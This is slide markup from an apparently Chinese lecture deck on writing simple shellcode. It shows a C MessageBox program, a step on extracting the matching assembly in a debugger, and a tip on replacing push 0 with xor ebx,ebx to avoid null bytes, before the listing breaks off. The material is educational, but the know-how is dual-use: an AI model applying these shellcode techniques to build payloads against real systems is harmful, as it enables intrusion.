        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25D7130-52A2-4F91-BD2D-83E4F6017EC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171469" y="2756853"/>
            <a:ext cx="2889754" cy="499432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>VC6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编写程序如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C488C632-A424-4725-AB3C-F456211809F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3117007" y="3328293"/>
            <a:ext cx="6843119" cy="3280706"/>
            <a:chOff x="3333031" y="3472160"/>
            <a:chExt cx="6843119" cy="3280706"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="矩形 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB87925-CB7D-4DEB-A76F-80589DD6567C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3760362" y="3472160"/>
              <a:ext cx="6415788" cy="3280706"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>#include &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>stdio.h</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>#include &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>windows.h</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>void main()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>{</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>MessageBox</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>(NULL,NULL,NULL,0);</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>	return;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="矩形: 圆角 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C5D18D8-9CB2-4927-96B9-6E0955BEF998}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3333031" y="3472309"/>
              <a:ext cx="6267055" cy="3280557"/>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12056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left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="98"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="8" decel="6000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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="22" presetClass="entr" presetSubtype="1"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up)">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20" grpId="0" animBg="1"/>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269135" y="837929"/>
            <a:ext cx="4320480" cy="474140"/>
            <a:chOff x="4269135" y="837929"/>
            <a:chExt cx="4320480" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF07046-8558-4F68-A567-BFF83801B119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269135" y="1312069"/>
              <a:ext cx="4320480"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4500001" y="837929"/>
              <a:ext cx="3858750" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>简单的编写</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832A7433-295D-472A-8920-856B4D551924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604839" y="1492164"/>
            <a:ext cx="3672408"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Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>第二步 换成对应的汇编代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25D7130-52A2-4F91-BD2D-83E4F6017EC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1667413" y="2072852"/>
            <a:ext cx="4761962" cy="499432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用调试功能，找到其对应的汇编代码：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5AA2159-0F9C-4C96-9B3B-9EE38601951C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1604839" y="2655179"/>
            <a:ext cx="5656981" cy="3841466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B762338C-E8CE-4158-B512-BC41927632C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7653511" y="2343800"/>
            <a:ext cx="3672409" cy="2712683"/>
            <a:chOff x="3333031" y="3472310"/>
            <a:chExt cx="5765357" cy="2016150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F096116-2FF5-4E31-9CDA-FABDFC81DFFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3546696" y="3682442"/>
              <a:ext cx="5338026" cy="1595886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>直接得到的汇编语言通常需要进行再加工。对于</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>push 0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>而言，可以通过上述的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>xor</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>ebx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>ebx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>之后执行</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>push </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>ebx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>来实现。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形: 圆角 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF96D66-92B2-4E47-BD73-1827E4D5E6EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3333031" y="3472310"/>
              <a:ext cx="5765357" cy="2016150"/>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710240949"/>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up)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="22" presetClass="entr" presetSubtype="1"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up)">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532831" y="808013"/>
            <a:ext cx="3672408" cy="394996"/>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在工程中编写汇编语言如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448BB3E5-C306-4128-B94E-4EE5501FFBCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532831" y="1203009"/>
            <a:ext cx="10153128" cy="5744987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
